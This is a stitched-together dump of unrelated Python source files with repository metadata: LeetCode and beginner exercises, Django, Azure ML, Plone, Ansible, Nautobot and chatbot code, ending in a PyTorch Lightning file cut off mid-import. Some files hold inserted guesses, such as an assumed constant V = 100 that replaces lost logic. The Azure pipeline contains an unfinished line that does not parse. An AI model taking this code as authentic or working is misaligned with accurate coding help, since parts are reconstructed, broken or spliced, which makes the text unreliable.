# 1. Right -> Right -> Down -> Down
# 2. Down -> Down -> Right -> Right


class Solution(object):
    def uniquePathsWithObstacles(self, obstacleGrid):
        """
        :type obstacleGrid: List[List[int]]
        :rtype: int
        """
        if not obstacleGrid:
            return 0
        if not obstacleGrid[0]:
            return 0
        table = [[-1] * len(obstacleGrid[0]) for _ in range(len(obstacleGrid))]
        table[0][0] = 1

        def paths(row, col):
            if row < 0 or col < 0 or row >= len(obstacleGrid) or col >= len(obstacleGrid[0]):
                return 0
            if obstacleGrid[row][col]:
                return 0
            if table[row][col] != -1:
                return table[row][col]
            ret = paths(row-1, col) + paths(row, col-1)
            table[row][col] = ret
            return ret

        ans = paths(len(obstacleGrid)-1, len(obstacleGrid[0])-1)
        return ans

# s = Solution()
# grid = [
#     [0, 0, 0],
#     [0, 1, 0],
#     [0, 0, 0],
#     [1, 0, 0]
# ]
# print(s.uniquePathsWithObstacles(grid))
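
The memoized recursion above encodes the recurrence paths(r, c) = paths(r-1, c) + paths(r, c-1), zeroed on obstacle cells. For reference, the same recurrence runs bottom-up in O(m*n) with no recursion depth to worry about (an added sketch, not part of the original solution):

def unique_paths_iterative(grid):
    if not grid or not grid[0]:
        return 0
    m, n = len(grid), len(grid[0])
    dp = [[0] * n for _ in range(m)]
    dp[0][0] = 0 if grid[0][0] else 1
    for r in range(m):
        for c in range(n):
            if grid[r][c] or (r == 0 and c == 0):
                continue  # obstacles stay 0; the start cell is already seeded
            dp[r][c] = (dp[r-1][c] if r else 0) + (dp[r][c-1] if c else 0)
    return dp[m-1][n-1]

assert unique_paths_iterative([[0, 0, 0], [0, 1, 0], [0, 0, 0]]) == 2
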
a311f00d4d3dc50b38cd6be0089d3287ffd215ea
53b307ed3c23c08ad95c46e4ed1b79ceb8cd3fe9
/panels/apps.py
7f4399c55c7fb010e218dd443330883d083231cd
[ "MIT" ]
permissive
mesebilisim/iotdashboard
e14fc66ecf03d109f01f5fc9253003dd676680cf
2e974d55015071f61e3d990f0d63d756a4763c24
refs/heads/master
2020-05-23T11:15:56.599010
2017-07-12T10:07:21
2017-07-12T10:07:21
68,567,736
0
0
null
2016-09-19T03:58:14
2016-09-19T03:58:14
null
UTF-8
Python
false
false
128
py
from __future__ import unicode_literals from django.apps import AppConfig class PanelsConfig(AppConfig): name = 'panels'
5dd3932daaae916d3a661747d79488a75852095f
bc531b7d1819ca5b8ba9d42395ce9e4676978fe1
/Chapter01/16_for_example.py
ed6310c3390261c1f4855fd75e4be6848680186a
[ "MIT" ]
permissive
PacktPublishing/Mastering-Python-Scripting-for-System-Administrators-
b72cacd9c54a3d9ec49100b2e5a49532960d58cc
d6ad3ea82ff503083176808166f727f52b187325
refs/heads/master
2023-01-27T19:56:06.109090
2023-01-18T09:00:19
2023-01-18T09:00:19
161,440,105
175
216
MIT
2022-10-08T19:33:46
2018-12-12T06:00:41
Python
UTF-8
Python
false
false
106
py
numbers = [6, 5, 3, 8, 4, 2, 5, 4, 11]
total = 0  # 'total' rather than 'sum', to avoid shadowing the built-in
for i in numbers:
    total = total + i
print("The sum is", total)
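# The same total via Python's built-in sum() function (usable here because the
# loop above binds the name 'total', not the built-in name 'sum'):
print("The sum is", sum(numbers))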
82ce6bb03f39e5756d72aef556a8417aa39e95cc
53fab060fa262e5d5026e0807d93c75fb81e67b9
/backup/user_083/ch77_2020_04_22_18_33_29_505824.py
5dc8be2d1349c4c3b224e2d146ccfba098fc6d3c
[]
no_license
gabriellaec/desoft-analise-exercicios
b77c6999424c5ce7e44086a12589a0ad43d6adca
01940ab0897aa6005764fc220b900e4d6161d36b
refs/heads/main
2023-01-31T17:19:42.050628
2020-12-16T05:21:31
2020-12-16T05:21:31
306,735,108
0
0
null
null
null
null
UTF-8
Python
false
false
234
py
# Assumption: the input maps each name to an acceleration, and the result maps
# each name to the time needed to reach a target speed V (tempo = V / a). The
# target speed is not recoverable from the original code, so V = 100 is assumed.
def calcula_tempo(dnomes_aceleração, V=100):
    novodic = {}
    for nome, a in dnomes_aceleração.items():
        novodic[nome] = V / a
    return novodic
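# Hypothetical usage (names and accelerations invented for illustration; with
# the assumed V = 100, an acceleration of 2.0 gives 100 / 2.0 = 50.0):
print(calcula_tempo({'carro': 2.0, 'moto': 4.0}))  # {'carro': 50.0, 'moto': 25.0}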
e0aec4b793d9baf3e77815a97b1a6fcda4f09d46
2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6
/ADVANCE/Modules/Renaming the module.py
3ec25656a999a01846ceee8a874dac28e2766867
[]
no_license
Ajay2521/Python
775b7d99736e83e4d0c37302b91d1413dd2c0d3b
a426dd7717de8a5e60e584d208ae7120bb84c1b3
refs/heads/master
2022-12-01T17:49:12.672061
2020-08-15T14:55:12
2020-08-15T14:55:12
273,632,074
1
0
null
null
null
null
UTF-8
Python
false
false
848
py
# Let's see about "renaming a module" in Python.

# It is possible to import a module under a specific user-defined name, called an "alias name".

# It is possible to access the functionality of the module through its "alias name", which was declared while importing the module.

# The syntax for renaming a module is:

# import moduleName as aliasName

# Here is a program that imports the module "Calculate.py" under an alias name.

import Calculate as Cal

# Get user input for the variables a and b.
a = int(input("\nEnter a value for \"a\" : "))

b = int(input("\nEnter a value for \"b\" : "))

# Access the functionality present in the module "Calculate" through the alias name, using the dot ( . ) operator.
Cal.Add(a, b)

Cal.Multi(a, b)

print()  # Used to print a new line for readability.
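# For reference, a minimal sketch of what the imported "Calculate.py" module
# might contain (assumed for illustration; the real module is not shown here):
#
# def Add(a, b):
#     print("Sum =", a + b)
#
# def Multi(a, b):
#     print("Product =", a * b)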
96a80deed9c0cdafbb52abf608c43ee8b5a7308a
cf4c9b102ab3a2720a045ad0b4c0b1d610738102
/shrike-examples/pipelines/experiments/demo_chain_components.py
a82c9bfd1775806779047e1a23422ef47d93bb33
[ "MIT", "LicenseRef-scancode-generic-cla" ]
permissive
isabella232/azure-ml-problem-sets
a7c0b0070b08598e5f473c91e47cad1fc3525a9b
5e6a3227032e51bb224a1085dc4f9ee9f8bd1dcf
refs/heads/main
2023-07-12T11:49:58.465710
2021-08-12T17:02:11
2021-08-12T17:02:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,297
py
""" The Azure ML pipeline that demonstrates how to chain components together. to execute: > python pipelines/experiments/demo_chain_components.py --config-dir pipelines/config --config-name experiments/demo_chain_components run.submit=True """ # pylint: disable=no-member # NOTE: because it raises 'dict' has no 'outputs' member in dsl.pipeline construction import os import sys from dataclasses import dataclass from typing import Optional from azure.ml.component import dsl from shrike.pipeline.pipeline_helper import AMLPipelineHelper # NOTE: if you need to import from pipelines.* ACCELERATOR_ROOT_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "..", "..") ) if ACCELERATOR_ROOT_PATH not in sys.path: print(f"Adding to path: {ACCELERATOR_ROOT_PATH}") sys.path.append(str(ACCELERATOR_ROOT_PATH)) class ChainComponentsDemo(AMLPipelineHelper): """Runnable/reusable pipeline helper class This class inherits from AMLPipelineHelper which provides helper functions to create reusable production pipelines. """ def build(self, config): """Builds a pipeline function for this pipeline using AzureML SDK (dsl.pipeline). This method returns a constructed pipeline function (decorated with @dsl.pipeline). Args: config (DictConfig): configuration object Returns: dsl.pipeline: the function to create your pipeline """ # helper functions below load the subgraph/component from registered or local version depending on your config.run.use_local probe_component = self.component_load("probe") # Here you should create an instance of a pipeline function (using your custom config dataclass) @dsl.pipeline( name="demo-chain-components", description="The Azure ML demo of a graph where components are chained, i.e. the input of a component is the output of an upstream component.", default_datastore=config.compute.compliant_datastore, ) def demo_pipeline_function(probe_dataset): """Pipeline function for this graph. Args: probe_dataset (FileDataset): input dataset (usually obtained through extraction from Heron portal) Returns: dict[str->PipelineOutputData]: a dictionary of your pipeline outputs for instance to be consumed by other graphs """ # general syntax: # module_instance = module_class(input=data, param=value) # or # subgraph_instance = subgraph_function(input=data, param=value) probe_component_step_1 = probe_component( input_data=probe_dataset, scan_args=config.probe1.scan_args, scan_deps=config.probe1.scan_deps, scan_input=config.probe1.scan_input, scan_env=config.probe1.scan_env, verbose=config.probe1.verbose, ) self.apply_recommended_runsettings( "probe", probe_component_step_1, gpu=True ) probe_component_step_2 = probe_component( input_data= # To-Do: this is where you need to connect teh output from the first probe component scan_args=config.probe2.scan_args, scan_deps=config.probe2.scan_deps, scan_input=config.probe2.scan_input, scan_env=config.probe2.scan_env, # here we're using a different parameter verbose=config.probe2.verbose, ) self.apply_recommended_runsettings( "probe", probe_component_step_2, gpu=True ) # return {key: output} return {"subgraph_results": probe_component_step_2.outputs.results} # finally return the function itself to be built by helper code return demo_pipeline_function def pipeline_instance(self, pipeline_function, config): """Given a pipeline function, creates a runnable instance based on provided config. This is used only when calling this as a runnable pipeline using .main() function (see below). 
The goal of this function is to map the config to the pipeline_function inputs and params. Args: pipeline_function (function): the pipeline function obtained from self.build() config (DictConfig): configuration object Returns: azureml.core.Pipeline: the instance constructed with its inputs and params. """ # NOTE: self.dataset_load() helps to load the dataset based on its name and version pipeline_input_dataset = self.dataset_load( name=config.inputs.input_data, version=config.inputs.input_data_version, ) # when all inputs are obtained, we call the pipeline function probe_pipeline = pipeline_function(probe_dataset=pipeline_input_dataset) # and we return that function so that helper can run it. return probe_pipeline # NOTE: main block is necessary only if script is intended to be run from command line if __name__ == "__main__": # calling the helper .main() function ChainComponentsDemo.main() # comment to bypass caching
bdd46ea024647f32161f4a683728f074d4063515
3ec3de2e1bdfe2890084f15ac4b0f0714aeff096
/collective/elasticsearch/brain.py
96b5288c5a80a83427d9c29de053589df5f03708
[]
no_license
eea/collective.elasticsearch
7d6afc0b5f66810ab7b3a6b8aa1835a187a07f7e
baaaa73245b4866936383b001f0dda17ad991846
refs/heads/master
2023-08-01T03:34:51.375866
2013-06-06T15:42:01
2013-06-06T15:42:01
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,008
py
from Acquisition import Implicit, aq_get from Products.ZCatalog.interfaces import ICatalogBrain from zope.interface import implements from zope.globalrequest import getRequest from Products.CMFPlone.utils import pretty_title_or_id from collective.elasticsearch.ejson import loads _marker = [] class Brain(Implicit): """ A special brain implementation that uses the results from elasticsearch to load the brain. """ implements(ICatalogBrain) __allow_access_to_unprotected_subobjects__ = True def __init__(self, data, catalog): self._idata = data self._raw_data = self._idata['_metadata'] self._data = None self._catalog = catalog @property def data(self): if self._data is None: self._data = loads(self._raw_data) return self._data def has_key(self, key): return key in self.data __contains__ = has_key @property def pretty_title_or_id(self): return pretty_title_or_id(self._catalog, self) def __getattr__(self, name, default=_marker): if name == 'REQUEST': request = aq_get(self._catalog, 'REQUEST', None) if request is None: request = getRequest() return request elif name[0] == '_': try: return self.__dict__[name] except KeyError: if default == _marker: raise AttributeError(name) else: return default if name in self.data: return self.data[name] elif name.startswith('portal_'): # XXX really ugly... return aq_get(self._catalog, name) def getPath(self): return '/'.join(self.getRawPath()) def getRawPath(self): try: # need to convert to string because we get # unicode from elastic path = self.data['_path'] newpath = [] for part in path: newpath.append(str(part)) return tuple(newpath) except KeyError: return () def getURL(self, relative=0): request = aq_get(self._catalog, 'REQUEST', None) if request is None: request = getRequest() return request.physicalPathToURL(self.getPath(), relative) def _unrestrictedGetObject(self): return self._catalog.unrestrictedTraverse(self.getPath()) def getObject(self, REQUEST=None): path = self.getRawPath() if not path: return None if len(path) > 1: parent = self._catalog.unrestrictedTraverse(path[:-1]) else: return '' return parent.restrictedTraverse(path[-1]) def getRID(self): """Return the record ID for this object.""" return self.data.get_id() def BrainFactory(catalog): def factory(result): brain = Brain(result, catalog) return brain.__of__(catalog) return factory
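# Illustrative wiring (assumed; in this package the factory is normally handed
# to the catalog's elasticsearch query machinery rather than called by hand):
#
#   factory = BrainFactory(catalog)
#   brains = [factory(hit) for hit in es_hits]  # each hit: one ES result dict
#   paths = [brain.getPath() for brain in brains]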
95782f795681aa0df4a8250fe3ef599924447b85
9c7958f4c55d33d8bb0175600f169c060aa11f6f
/scripts/motifplot.py
ad3e8622dea75d1e259bb09292c37938b7b13e2b
[]
no_license
knutdrand/snakemakes
a245de79119dc0dc982f85e846149e3754ef64a9
9dd2355271d3da8d4767f7dac877f65f62d1aa9b
refs/heads/master
2021-03-29T07:52:44.110983
2020-10-09T13:27:45
2020-10-09T13:27:45
247,933,836
0
0
null
null
null
null
UTF-8
Python
false
false
445
py
import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt import numpy as np get_name = lambda parts: f"{parts[0]}:{parts[1]}-{parts[2]}" matches = {line.split("\t")[2] for line in open(snakemake.input[0]) if not line.startswith("#") and line.strip()} hits = [get_name(line.split()) in matches for line in open(snakemake.input[1])] ratio = np.cumsum(hits)/np.arange(1, len(hits)+1) plt.plot(ratio) plt.savefig(snakemake.output[0])
445eb26dceab288fcefe4c720a8fa3fbc6b81d7d
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_7494.py
b38b7c1f41b50bf66fd918b09831b5f03145d689
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
62
py
# Clean URL with BeautifulSoup
# (`urls` was left undefined in the original fragment; a sample list is
# assumed here for illustration)
urls = ["http://example.com/page?a=1", "http://example.com/other"]
for url in urls:
    print(url)
18632c639d4fef98ebd9a9968a695fcee2060ef2
64bf39b96a014b5d3f69b3311430185c64a7ff0e
/intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/azure/azcollection/plugins/modules/azure_rm_postgresqlconfiguration.py
0fb4da64c8f89a0b4fe91409820956533bfbbb59
[ "GPL-1.0-or-later", "GPL-3.0-only", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
SimonFangCisco/dne-dna-code
7072eba7da0389e37507b7a2aa5f7d0c0735a220
2ea7d4f00212f502bc684ac257371ada73da1ca9
refs/heads/master
2023-03-10T23:10:31.392558
2021-02-25T15:04:36
2021-02-25T15:04:36
342,274,373
0
0
MIT
2021-02-25T14:39:22
2021-02-25T14:39:22
null
UTF-8
Python
false
false
8,121
py
#!/usr/bin/python
#
# Copyright (c) 2019 Zim Kalinowski, (@zikalino)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type


ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}


DOCUMENTATION = '''
---
module: azure_rm_postgresqlconfiguration
version_added: "0.1.2"
short_description: Manage Azure PostgreSQL Configuration
description:
    - Update or reset Azure PostgreSQL Configuration setting.

options:
    resource_group:
        description:
            - The name of the resource group that contains the resource.
        required: True
    server_name:
        description:
            - The name of the server.
        required: True
    name:
        description:
            - Setting name.
        required: True
    value:
        description:
            - Setting value.
    state:
        description:
            - Assert the state of the PostgreSQL setting. Use C(present) to update setting, or C(absent) to reset to default value.
        default: present
        choices:
            - absent
            - present

extends_documentation_fragment:
    - azure.azcollection.azure

author:
    - Zim Kalinowski (@zikalino)

'''

EXAMPLES = '''
  - name: Update PostgreSQL Server setting
    azure_rm_postgresqlconfiguration:
      resource_group: myResourceGroup
      server_name: myServer
      name: deadlock_timeout
      value: 2000
'''

RETURN = '''
id:
    description:
        - Resource ID.
    returned: always
    type: str
    sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforPostgreSQL/servers/myServer/configurations/event_scheduler"
'''

import time

try:
    from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase
    from msrestazure.azure_exceptions import CloudError
    from msrest.polling import LROPoller
    from azure.mgmt.rdbms.postgresql import PostgreSQLManagementClient
    from msrest.serialization import Model
except ImportError:
    # This is handled in azure_rm_common
    pass


class Actions:
    NoAction, Create, Update, Delete = range(4)


class AzureRMPostgreSqlConfigurations(AzureRMModuleBase):

    def __init__(self):
        self.module_arg_spec = dict(
            resource_group=dict(
                type='str',
                required=True
            ),
            server_name=dict(
                type='str',
                required=True
            ),
            name=dict(
                type='str',
                required=True
            ),
            value=dict(
                type='str'
            ),
            state=dict(
                type='str',
                default='present',
                choices=['present', 'absent']
            )
        )

        self.resource_group = None
        self.server_name = None
        self.name = None
        self.value = None

        self.results = dict(changed=False)
        self.state = None
        self.to_do = Actions.NoAction

        super(AzureRMPostgreSqlConfigurations, self).__init__(derived_arg_spec=self.module_arg_spec,
                                                              supports_check_mode=True,
                                                              supports_tags=False)

    def exec_module(self, **kwargs):

        for key in list(self.module_arg_spec.keys()):
            if hasattr(self, key):
                setattr(self, key, kwargs[key])

        old_response = None
        response = None

        old_response = self.get_configuration()

        if not old_response:
            self.log("Configuration instance doesn't exist")
            if self.state == 'absent':
                self.log("Old instance didn't exist")
            else:
                self.to_do = Actions.Create
        else:
            self.log("Configuration instance already exists")
            if self.state == 'absent' and old_response['source'] == 'user-override':
                self.to_do = Actions.Delete
            elif self.state == 'present':
                self.log("Need to check if Configuration instance has to be deleted or may be updated")
                if self.value != old_response.get('value'):
                    self.to_do = Actions.Update

        if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
            self.log("Need to Create / Update the Configuration instance")

            if self.check_mode:
                self.results['changed'] = True
return self.results response = self.create_update_configuration() self.results['changed'] = True self.log("Creation / Update done") elif self.to_do == Actions.Delete: self.log("Configuration instance deleted") self.results['changed'] = True if self.check_mode: return self.results self.delete_configuration() else: self.log("Configuration instance unchanged") self.results['changed'] = False response = old_response if response: self.results["id"] = response["id"] return self.results def create_update_configuration(self): self.log("Creating / Updating the Configuration instance {0}".format(self.name)) try: response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name, value=self.value, source='user-override') if isinstance(response, LROPoller): response = self.get_poller_result(response) except CloudError as exc: self.log('Error attempting to create the Configuration instance.') self.fail("Error creating the Configuration instance: {0}".format(str(exc))) return response.as_dict() def delete_configuration(self): self.log("Deleting the Configuration instance {0}".format(self.name)) try: response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name, source='system-default') except CloudError as e: self.log('Error attempting to delete the Configuration instance.') self.fail("Error deleting the Configuration instance: {0}".format(str(e))) return True def get_configuration(self): self.log("Checking if the Configuration instance {0} is present".format(self.name)) found = False try: response = self.postgresql_client.configurations.get(resource_group_name=self.resource_group, server_name=self.server_name, configuration_name=self.name) found = True self.log("Response : {0}".format(response)) self.log("Configuration instance : {0} found".format(response.name)) except CloudError as e: self.log('Did not find the Configuration instance.') if found is True: return response.as_dict() return False def main(): """Main execution""" AzureRMPostgreSqlConfigurations() if __name__ == '__main__': main()
75e77756f7e98beff12a713496ae5b97436d939e
4f6e4fdc31396ee5ca8995d796af0365d0976934
/scripts/collect_manifest.py
91955f9409e83ceb223aa2225c1a34e317e45502
[]
no_license
dannguyen/quickdataproject-template
ea84426629cb5aa3b3be9adc089b9e8c290c32cb
8f598b3abd9f23b39bf26a807d217f165fb03289
refs/heads/master
2022-11-29T05:29:22.383439
2020-08-06T00:07:06
2020-08-06T00:07:06
282,715,134
4
1
null
null
null
null
UTF-8
Python
false
false
1,431
py
#!/usr/bin/env python

"""
collect_manifest.py

Reads data/DATA_MANIFEST.yaml, and for each entry where autocollect==true,
downloads from the corresponding `url`
"""

from sys import path as syspath; syspath.append('./scripts')
from utils.myfetch import download, existed_size
from utils.mylog import mylog

from pathlib import Path
import requests
import yaml

MANIFEST_PATH = Path('./data/DATA_MANIFEST.yaml')


def collect_manifest():
    """
    returns list of tuples, with file filepath and source url
        filtered for data/collected prefixes
    """
    mani = yaml.load(MANIFEST_PATH.open(), Loader=yaml.BaseLoader)
    return [(filepath, v['url']) for filepath, v in mani.items() if v.get('autocollect') == 'true']


def main():
    target_dir = MANIFEST_PATH.parent
    for filename, url in collect_manifest():
        target_path = target_dir.joinpath(filename)
        _bx = existed_size(target_path)
        if _bx:
            mylog(f"{target_path} already exists, with {_bx} bytes", label='Skipping')
        else:
            mylog(url, label='Fetching')
            content = download(url)
            target_path.parent.mkdir(exist_ok=True, parents=True)
            with open(target_path, 'wb') as target:
                for cx in content:
                    target.write(cx)
            mylog(f"{existed_size(target_path)} bytes to {target_path}", label='Wrote')


if __name__ == '__main__':
    main()
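# Example data/DATA_MANIFEST.yaml entry this script expects (illustrative;
# yaml.BaseLoader loads every scalar as a string, so the bare `true` below
# satisfies the v.get('autocollect') == 'true' check):
#
#   collected/some_table.csv:
#     url: https://example.com/some_table.csv
#     autocollect: true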
caad16e683e5fb3ded0072a758ed1fe6f5324386
9e2943857c3b5b46b4fea59f0e9a46aae54e17a8
/nautobot_golden_config/template_content.py
3462a238d115e16e9ed5aa778004d862ee60b025
[ "Apache-2.0" ]
permissive
danisoltani/nautobot-plugin-golden-config
883e40ef313c29d3d5197b7f17ca68e76e7bad95
f285af4bdc6340ae7276c372d3e85a0021c078ed
refs/heads/develop
2023-05-05T18:51:47.439841
2021-04-28T04:28:48
2021-04-28T04:28:48
363,667,445
0
0
NOASSERTION
2021-05-02T14:56:00
2021-05-02T14:14:22
null
UTF-8
Python
false
false
3,317
py
"""Added content to the device model view for config compliance.""" from django.db.models import Count, Q from nautobot.extras.plugins import PluginTemplateExtension from .models import ConfigCompliance, GoldenConfiguration from .utilities.constant import ENABLE_COMPLIANCE, CONFIG_FEATURES from .utilities.helper import get_allowed_os_from_nested class ConfigComplianceDeviceCheck(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.device" def get_device(self): """Get device object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" comp_obj = ( ConfigCompliance.objects.filter(**get_allowed_os_from_nested()) .filter(device=self.get_device()) .values("feature", "compliance") ) extra_context = { "compliance": comp_obj, "device": self.get_device(), "template_type": "device-compliance", } return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) class ConfigComplianceSiteCheck(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.site" def get_site_slug(self): """Get site object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" comp_obj = ( ConfigCompliance.objects.values("feature") .filter(**get_allowed_os_from_nested()) .filter(device__site__slug=self.get_site_slug().slug) .annotate( compliant=Count("feature", filter=Q(compliance=True)), non_compliant=Count("feature", filter=~Q(compliance=True)), ) .values("feature", "compliant", "non_compliant") ) extra_context = {"compliance": comp_obj, "template_type": "site"} return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) class ConfigDeviceDetails(PluginTemplateExtension): # pylint: disable=abstract-method """Plugin extension class for config compliance.""" model = "dcim.device" def get_device(self): """Get device object.""" return self.context["object"] def right_page(self): """Content to add to the configuration compliance.""" golden_config = ( GoldenConfiguration.objects.filter(**get_allowed_os_from_nested()).filter(device=self.get_device()).first() ) extra_context = { "device": self.get_device(), # device, "golden_config": golden_config, "template_type": "device-configs", "config_features": CONFIG_FEATURES, } return self.render( "nautobot_golden_config/content_template.html", extra_context=extra_context, ) extensions = [ConfigDeviceDetails] if ENABLE_COMPLIANCE: extensions.append(ConfigComplianceDeviceCheck) extensions.append(ConfigComplianceSiteCheck) template_extensions = extensions
49eb833b90b654ddd54f089d23f66718dd3cdf2b
15085c0dfc7f596fc03e2d69e9775860d5aece2b
/echo/main.py
6626d60850553bdbdc47c0dded10c03dad4bc93a
[ "MIT" ]
permissive
botstory/echo-bot
1fb56d48236d34b0a3f3f74cee0478a1df7b0414
9758fb5baf0fe033a2e29a8fb092e5a40ea70a0b
refs/heads/develop
2021-09-08T02:26:44.739492
2016-12-21T23:37:29
2016-12-21T23:37:29
71,016,543
0
0
MIT
2018-03-06T01:05:28
2016-10-15T22:18:12
Python
UTF-8
Python
false
false
4,719
py
#!/usr/bin/env python
import asyncio
from aiohttp_index import IndexMiddleware
from botstory import chat, story
from botstory.integrations import aiohttp, fb, mongodb
from botstory.integrations.ga import tracker
from botstory.middlewares import any, text
import logging
import os
import pathlib

logger = logging.getLogger('echo-bot')
logger.setLevel(logging.DEBUG)

PROJ_ROOT = pathlib.Path(__file__).parent


# define stories
@story.on_start()
def on_start():
    """
    User just pressed `get started` button so we can greet him
    """

    @story.part()
    async def greetings(message):
        await chat.say('Hi There! Nice to see you! ', message['user'])
        await chat.say("I'm a very simple bot that shows basic features of "
                       'https://github.com/botstory/botstory '
                       'open source platform.', message['user'])
        await chat.say('You can send me any text message and '
                       'I will echo it back to you.', message['user'])
        await chat.say('Any other messages will just bounce '
                       'with a trivial answer '
                       "that I don't know what it is.", message['user'])
        await chat.say('You can find my source here '
                       'https://github.com/botstory/echo-bot.', message['user'])
        await chat.say("Let's make the best bot together!", message['user'])


@story.on(receive=text.Any())
def echo_story():
    """
    React on any text message
    """

    @story.part()
    async def echo(message):
        await chat.say('Hi! I just got something from you:', message['user'])
        await chat.say('> {}'.format(message['data']['text']['raw']), message['user'])


@story.on(receive=any.Any())
def else_story():
    """
    And all the rest messages as well
    """

    @story.part()
    async def something_else(message):
        await chat.say("Hm, I don't know what it is", message['user'])


# setup modules
def init(auto_start=True, fake_http_session=None):
    # Interface for communication with FB
    story.use(fb.FBInterface(
        # will show on initial screen
        greeting_text="Hello dear {{user_first_name}}! "
                      "I'm a demo bot of the BotStory framework.",
        # you get this in the admin panel, under the Messenger Product's Token Generation section
        page_access_token=os.environ.get('FB_ACCESS_TOKEN', 'TEST_TOKEN'),
        # bot menu that the user can access at any time
        persistent_menu=[{
            'type': 'postback',
            'title': 'Monkey Business',
            'payload': 'MONKEY_BUSINESS'
        }, {
            'type': 'web_url',
            'title': 'Source Code',
            'url': 'https://github.com/botstory/bot-story/'
        }],
        # should be the same as in the admin panel for the Webhook Product
        webhook_url='/webhook{}'.format(os.environ.get('FB_WEBHOOK_URL_SECRET_PART', '')),
        webhook_token=os.environ.get('FB_WEBHOOK_TOKEN', None),
    ))

    # Interface for HTTP
    http = story.use(aiohttp.AioHttpInterface(
        port=os.environ.get('API_PORT', 8080),
        auto_start=auto_start,
        middlewares=[IndexMiddleware()],
    ))

    # User and Session storage
    story.use(mongodb.MongodbInterface(
        uri=os.environ.get('MONGODB_URI', 'mongo'),
        db_name=os.environ.get('MONGODB_DB_NAME', 'echobot'),
    ))

    story.use(tracker.GAStatistics(
        tracking_id=os.environ.get('GA_ID'),
    ))

    # for test purpose
    http.session = fake_http_session

    return http


async def setup(fake_http_session=None):
    logger.info('setup')
    init(auto_start=False, fake_http_session=fake_http_session)
    await story.setup()


async def start(auto_start=True, fake_http_session=None):
    http = init(auto_start, fake_http_session)
    logger.debug('static {}'.format(str(PROJ_ROOT.parent / 'static')))
    http.app.router.add_static('/',
                               path=str(PROJ_ROOT.parent / 'static'),
                               name='static',
                               )

    # start bot
    await story.start()
    logger.info('started')
    return http.app


async def stop():
    await story.stop()
    # TODO: should be something like
    # story.clear()
    story.middlewares = []


# launch app
def main(forever=True):
    logging.basicConfig(level=logging.DEBUG)
    loop = asyncio.get_event_loop()
    app = loop.run_until_complete(start(auto_start=forever))

    # and run forever
    if forever:
        story.forever(loop)
    # or you can use gunicorn for an app of http interface
    return app


if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(setup())
d41ed24523fdec28e5f5f3c79923497b57af5d94
b96a4062f5ad420dd02efed82b47dd9c249cb46c
/pytorch_lightning/trainer/connectors/accelerator_connector.py
d32970d61fa9bc5fde735ca940cf77c6f67147c2
[ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ]
permissive
borisdayma/pytorch-lightning
ebc210a1e7901b5f87ab67e4886bfe20b478fe33
4b7c0fae00084b72dffe37fdd0ea7d2e9b60d103
refs/heads/master
2021-11-23T07:34:01.842134
2021-02-19T17:00:27
2021-02-19T17:00:27
238,756,095
1
1
Apache-2.0
2020-02-06T18:27:51
2020-02-06T18:27:50
null
UTF-8
Python
false
false
25,287
py
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from typing import List, Optional, Sequence, Union import torch from pytorch_lightning import _logger as log from pytorch_lightning.accelerators.accelerator import Accelerator from pytorch_lightning.accelerators.cpu import CPUAccelerator from pytorch_lightning.accelerators.gpu import GPUAccelerator from pytorch_lightning.accelerators.tpu import TPUAccelerator from pytorch_lightning.plugins import ( ApexMixedPrecisionPlugin, DataParallelPlugin, DDP2Plugin, DDPPlugin, DDPShardedPlugin, DDPSpawnPlugin, DDPSpawnShardedPlugin, DeepSpeedPlugin, DeepSpeedPrecisionPlugin, HorovodPlugin, NativeMixedPrecisionPlugin, PrecisionPlugin, ShardedNativeMixedPrecisionPlugin, SingleDevicePlugin, SingleTPUPlugin, TPUHalfPrecisionPlugin, TPUSpawnPlugin, TrainingTypePlugin, ) from pytorch_lightning.plugins.environments import ClusterEnvironment, SLURMEnvironment, TorchElasticEnvironment from pytorch_lightning.tuner.auto_gpu_select import pick_multiple_gpus from pytorch_lightning.utilities import ( _APEX_AVAILABLE, _HOROVOD_AVAILABLE, _NATIVE_AMP_AVAILABLE, _TPU_AVAILABLE, AMPType, device_parser, DeviceType, DistributedType, rank_zero_only, ) from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException if _HOROVOD_AVAILABLE: import horovod.torch as 